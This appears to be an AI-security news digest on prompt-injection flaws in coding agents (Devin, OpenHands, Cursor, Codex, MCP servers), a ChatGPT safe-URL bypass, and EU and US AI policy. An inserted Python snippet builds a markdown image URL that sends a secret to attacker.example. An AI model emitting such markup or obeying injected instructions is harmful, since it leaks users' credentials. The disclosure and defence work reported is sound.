New tools, products, platforms, funding rounds, and company developments in AI security.
OpenHands, an AI agent tool created by All-Hands AI, has a vulnerability where it can render images in chat conversations, which attackers can exploit through prompt injection (tricking an AI by hiding instructions in its input) to leak access tokens (security credentials that grant permission to use services) without requiring user interaction. This type of attack has been called the 'Lethal Trifecta' and represents a significant data exfiltration (unauthorized data theft) risk.
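The exfiltration mechanism described above can be sketched in a few lines. This is an illustrative reconstruction, not OpenHands code: the attacker's domain and the markdown shape are assumptions, but the pattern — an injected instruction makes the agent emit a markdown image whose URL carries the secret, and the chat UI's automatic image fetch delivers it — is the core of the attack.

```python
from urllib.parse import quote

# Hypothetical attacker-controlled endpoint, for illustration only.
ATTACKER_URL = "https://attacker.example/collect"

def exfil_markdown_image(secret: str) -> str:
    """Markdown an injected prompt might ask the agent to emit.

    When the chat UI renders the image, it fetches the URL without any
    user interaction, and the secret travels to the attacker's server
    in the query string.
    """
    return f"![loading]({ATTACKER_URL}?t={quote(secret)})"

print(exfil_markdown_image("ghp_example_token"))
```

The defense side follows directly: agents should render images only from an allowlist of trusted domains, which breaks the callback to the attacker's server.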
Devin AI, a tool that acts as an AI software engineer, is vulnerable to prompt injection (tricking an AI by hiding malicious instructions in its input) attacks that can lead to full system compromise. By planting malicious instructions on websites or GitHub issues that Devin reads, attackers can trick it into downloading and running malware, giving them remote control over Devin's DevBox (the sandboxed environment where Devin operates) and access to any stored secrets.
Cursor IDE (an AI-powered code editor) has a vulnerability where it can render Mermaid diagrams (a tool for creating flowcharts and diagrams from simple text) that include external image requests without user confirmation. An attacker can use prompt injection (tricking the AI by hiding malicious instructions in code comments or other inputs) to embed image URLs in these diagrams, allowing them to steal sensitive data like API keys or user memories by encoding that information in the URL sent to an attacker-controlled server.
Anthropic's filesystem MCP server (a tool that lets AI assistants like Claude access your computer's files) had a path validation vulnerability where it only checked if a file path started with an allowed directory name, rather than confirming it was actually in that directory. This meant if you allowed access to /mnt/finance/data, the AI could also access sibling files like /mnt/finance/data-archived because the path string starts the same way.
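The prefix-matching bug generalizes well beyond this one server, so a minimal sketch is worth spelling out. The directory names come from the item above; the function names are hypothetical, and this is not the MCP server's actual code:

```python
import os

ALLOWED_ROOT = "/mnt/finance/data"

def naive_is_allowed(path: str) -> bool:
    # Vulnerable check: a plain string-prefix test also matches sibling
    # directories such as /mnt/finance/data-archived.
    return path.startswith(ALLOWED_ROOT)

def strict_is_allowed(path: str) -> bool:
    # Safer check: normalize the path, then require it to be the allowed
    # directory itself or to sit beneath it, so the prefix match must end
    # exactly at a path-separator boundary.
    norm = os.path.normpath(path)
    return norm == ALLOWED_ROOT or norm.startswith(ALLOWED_ROOT + os.sep)

print(naive_is_allowed("/mnt/finance/data-archived/q1.csv"))   # True (the bug)
print(strict_is_allowed("/mnt/finance/data-archived/q1.csv"))  # False
print(strict_is_allowed("/mnt/finance/data/report.csv"))       # True
```

Resolving symlinks (e.g. with `os.path.realpath`) before the comparison closes a related hole where a link inside the allowed directory points outside it.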
On July 18, 2025, the European Commission released draft Guidelines that explain how the EU AI Act applies to General Purpose AI models (GPAI, flexible AI systems that can handle many different tasks). The Guidelines define GPAI models by a training-compute threshold of 10²³ FLOPs (floating-point operations, a measure of compute that grows with both model size and training-data size), require providers to document their models and report serious incidents, and impose stricter obligations on very large models trained with 10²⁵ FLOPs or more. Providers of these large models must notify the Commission within two weeks and can request reassessment of their systemic-risk classification if they provide evidence the model is not actually risky.
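To make the threshold concrete, training compute is often estimated with the community rule of thumb FLOPs ≈ 6 × parameters × training tokens. This heuristic is an assumption on my part, not taken from the Guidelines, but it shows the scale of model that crosses the 10²³ line:

```python
# Back-of-the-envelope training-compute estimate using the common
# heuristic FLOPs ≈ 6 × parameters × training tokens (a community rule
# of thumb, not the Commission's own formula).
def training_flops(params: float, tokens: float) -> float:
    return 6.0 * params * tokens

# Example: a 10B-parameter model trained on ~1.7 trillion tokens
flops = training_flops(10e9, 1.7e12)
print(f"{flops:.2e}")  # ~1.02e+23, just over the GPAI threshold
```

By the same heuristic, the 10²⁵ FLOPs systemic-risk tier corresponds to roughly a hundred times that training run.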
The Code of Practice is a framework that helps developers of General Purpose AI models (large AI systems designed for many different tasks) comply with EU AI Act requirements, though following it is voluntary. New GPAI models released after August 2, 2025 must comply immediately, while older models have until August 2, 2027, with enforcement actions delayed until August 2, 2026 to give developers time to adjust.
The U.S. Senate voted 99-1 to remove a provision from a Republican bill that would have prevented states from regulating AI if they wanted to receive federal broadband expansion funds. The provision was weakened by Senate rules that limited it to only $500 million in new funding rather than $42.45 billion in total broadband funds, making it less likely states would comply even if it had passed.
This content discusses security challenges in agentic AI (AI systems that can act autonomously and use tools), emphasizing that generic jailbreak testing (attempts to trick AI into ignoring safety guidelines) misses real operational risks like tool misuse and data theft. The articles highlight that enterprises need contextual red teaming (security testing that simulates realistic attack scenarios relevant to how the AI will actually be used) and governance frameworks like identity controls and boundaries to secure autonomous AI systems.
Devin AI has a tool called expose_port that can publish local computer ports to the public internet, intended for testing websites during development. However, attackers can use prompt injection (tricking an AI by hiding instructions in its input) to manipulate Devin into exposing sensitive files and creating backdoor access without human approval, as demonstrated through a multi-stage attack that gradually steers the AI toward malicious actions.
Devin AI can be tricked into leaking sensitive information to attackers through multiple methods, including using its Shell tool to run data-stealing commands, using its Browser tool to send secrets to attacker-controlled websites, rendering images from untrusted domains, and posting hidden data to connected services like Slack. These attacks work because Devin has unrestricted internet access and can be manipulated through indirect prompt injection (tricking an AI by hiding malicious instructions in its input), where attackers embed instructions in places like GitHub issues that Devin investigates.
Amp, an AI coding agent by Sourcegraph, had a vulnerability where it could modify its own configuration files to enable arbitrary command execution (running any code on a developer's machine) through two methods: adding bash commands to an allowlist or installing malicious MCP servers (external programs the AI can invoke). This could be exploited by the AI itself or through prompt injection attacks (tricking the AI by hiding malicious instructions in its input).
Fix: Make sure to run the latest version; Amp ships updates frequently. The vulnerability was identified in early July, reported to Sourcegraph, and promptly fixed by the Amp team.
Embrace The Red
Fix: Anthropic rewrote the filesystem server to support MCP's roots feature, and the updated release fixed the vulnerability, which is tracked as CVE-2025-53109.
Embrace The Red
ChatGPT Codex, a cloud-based AI tool that answers code questions and writes software, is vulnerable to prompt injection (tricking an AI by hiding instructions in its input) attacks that can turn it into a botnet (a network of compromised computers controlled remotely). An attacker can exploit the "Common Dependencies Allowlist" feature, which allows Codex internet access to certain approved servers, by hosting malicious code on Azure and injecting fake instructions into GitHub issues to hijack Codex and steal sensitive data or run malware.
Fix: Review the allowlist for the Dependency Set and apply a fine-grained approach. OpenAI recommends only using a self-defined allowlist when enabling Internet access, as Codex can be configured very granularly. Additionally, consider installing EDR (endpoint detection and response, security software that monitors suspicious activity) and other monitoring software on AI agents to track their behavior and detect if malware is installed.
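The fine-grained allowlist OpenAI recommends amounts to an egress policy: only explicitly trusted hosts are reachable. A minimal sketch of such a check (hypothetical policy code, not part of Codex, with example hosts chosen for illustration):

```python
from urllib.parse import urlparse

# Sketch of a fine-grained egress allowlist: permit outbound requests
# only to hosts you explicitly trust, and deny everything else.
ALLOWED_HOSTS = {"pypi.org", "files.pythonhosted.org"}

def egress_allowed(url: str) -> bool:
    host = (urlparse(url).hostname or "").lower()
    return host in ALLOWED_HOSTS

print(egress_allowed("https://pypi.org/simple/requests/"))         # True
print(egress_allowed("https://evil.example.net/payload.sh"))       # False
```

Matching on the parsed hostname rather than a substring of the URL matters: substring checks are defeated by URLs like `https://pypi.org.evil.example.net/`.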
Embrace The Red
A researcher discovered that ChatGPT's 'safe URL' feature, which is supposed to prevent data theft, can be bypassed using prompt injection (tricking an AI by hiding malicious instructions in its input). By exploiting this bypass, an attacker can trick ChatGPT into sending sensitive information like your chat history and memories to a server they control, especially if you ask ChatGPT to process untrusted content like PDFs or websites.
The Trump Administration released an AI Action Plan with policies across three areas: accelerating innovation, building infrastructure, and international leadership. While the plan primarily focuses on speeding up US AI development, it also includes several AI safety policies such as investing in AI interpretability (how AI systems make decisions), building evaluation systems to test AI safety, strengthening cybersecurity, and controlling exports of powerful AI chips.
The Month of AI Bugs 2025 is an initiative to expose security vulnerabilities in agentic AI systems (AI that can take actions on its own), particularly coding agents, through responsible disclosure and public education. The campaign will publish over 20 blog posts demonstrating exploits, including prompt injection (tricking an AI by hiding malicious instructions in its input) attacks that can allow attackers to compromise a developer's computer without permission. While some vendors have fixed reported vulnerabilities quickly, others have ignored reports for months or stopped responding, and many appear uncertain how to address novel AI security threats.
Meta's new Llama 4 models (Scout and Maverick) were tested for security vulnerabilities using Protect AI's Recon tool, which runs 450+ attack prompts across six categories including jailbreaks (attempts to make AI ignore safety rules), prompt injection (tricking an AI by hiding instructions in its input), and evasion (using obfuscation to hide malicious requests). Both models received medium-risk scores (Scout: 58/100, Maverick: 52/100), with Scout showing particular vulnerability to jailbreak attacks at 67.3% success rate, though Maverick demonstrated better overall resilience.
The EU published a General-Purpose AI Code of Practice in July 2025 to clarify how AI developers should comply with the EU AI Act's safety requirements, which had been ambiguously worded. The Code establishes a three-step framework for identifying, analyzing, and determining whether systemic risks (including CBRN threats, loss of control, cyber attacks, and harmful manipulation) are acceptable before deploying large AI models, along with requirements for continuous monitoring and incident reporting.
Fix: The EU General-Purpose AI Code of Practice provides a structured approach requiring GPAI providers to: (1) Identify potential systemic risks in four categories (CBRN, loss of control, cyber offense capabilities, and harmful manipulation), (2) Analyze each risk using model evaluations and third-party evaluators when necessary, (3) Determine whether risks are acceptable and implement safety and security mitigations if not, and (4) Conduct continuous monitoring after deployment with strict incident reporting timelines.
CAIS AI Safety Newsletter
Google is automatically enabling its Gemini AI to access third-party apps like WhatsApp on Android devices, overriding previous user settings that blocked such access. Users who want to prevent this must take action, though Google's guidance on how to fully disable Gemini integrations is unclear and confusing, with the company stating that even when Gemini access is blocked, data is still stored for 72 hours.
Fix: According to a Tuta researcher cited in the article, disabling Gemini app activity is likely to prevent data collection beyond the 72-hour temporary storage period. Additionally, if the Gemini app is not already installed on a device, it will not be installed after the change takes effect.
Ars Technica (Security)
Anthropic's Slack MCP Server (a tool that lets AI agents interact with Slack) has a vulnerability where it doesn't disable link unfurling, a feature that automatically previews hyperlinks in messages. An attacker can use prompt injection (tricking an AI by hiding instructions in its input) to make an AI agent post a malicious link to Slack, which then leaks sensitive data like API keys to the attacker's server when Slack's systems automatically fetch the preview.
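Slack's `chat.postMessage` API exposes `unfurl_links` and `unfurl_media` flags, so one straightforward mitigation is to disable unfurling on every message an agent posts. A defensive sketch (the helper is hypothetical, but the two flags are real `chat.postMessage` parameters):

```python
# Defensive sketch: when an agent posts to Slack, explicitly disable
# link unfurling so Slack's servers never fetch attacker-supplied URLs.
def build_post_payload(channel: str, text: str) -> dict:
    return {
        "channel": channel,
        "text": text,
        "unfurl_links": False,  # no automatic previews of hyperlinks
        "unfurl_media": False,  # no automatic previews of media links
    }

payload = build_post_payload("#alerts", "scan finished")
print(payload["unfurl_links"])  # False
```

This blocks the unfurl-based callback channel; it does not stop an injected agent from posting a secret in plain text, so it complements rather than replaces output filtering.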
Runtime attacks on large language models are rapidly increasing, with jailbreak techniques (methods that bypass AI safety restrictions) and denial-of-service exploits (attacks that make systems unavailable) becoming more sophisticated and widely shared through open-source platforms like GitHub. The report explains that these attacks have evolved from isolated research experiments into organized toolkits accessible to threat actors, affecting production AI deployments across enterprises.